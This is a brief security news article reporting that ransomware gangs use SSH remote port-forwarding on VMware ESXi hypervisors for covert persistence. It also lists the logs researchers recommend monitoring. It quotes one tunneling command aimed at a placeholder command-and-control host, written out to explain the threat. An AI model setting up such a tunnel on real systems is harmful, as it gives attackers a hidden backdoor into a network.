Ransomware

Covert Ransomware Hack On ESXi Hypvervisors Done Via SSH Tunneling

Covert ransomware attack on VMware ESXi hypervisors executed via SSH tunneling. (Adobe Stock)

VMware ESXi hypervisors are being clandestinely subjected to ransomware intrusions involving the exploitation of SSH tunneling for persistence, reports BleepingComputer.

Sygnia reports that after infiltrating ESXi instances by leveraging known vulnerabilities or stolen admin credentials, ransomware gangs used the built-in SSH service to facilitate lateral movement and ransomware delivery without being detected.

The researchers said by using the SSH binary, a remote port-forwarding to the C2 server can be easily setup by using the following command: ssh –fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>.

"Since ESXi appliances are resilient and rarely shutdown unexpectedly, this tunneling serves as a semi-persistent backdoor within the network," said Sygnia.

This news prompted researchers to recommend monitoring of four log files for tracking ESXi Shell command execution, conducting admin and user authentication logs, obtaining attempted logins and authentication events, and keeping security event and system logs.

Admins have also been urged to view the hostd.log and vodb.log to identify possible SSH access persistence.

An In-Depth Guide to Ransomware

Get essential knowledge and practical strategies to protect your organization from ransomware attacks.

You can skip this ad in 5 seconds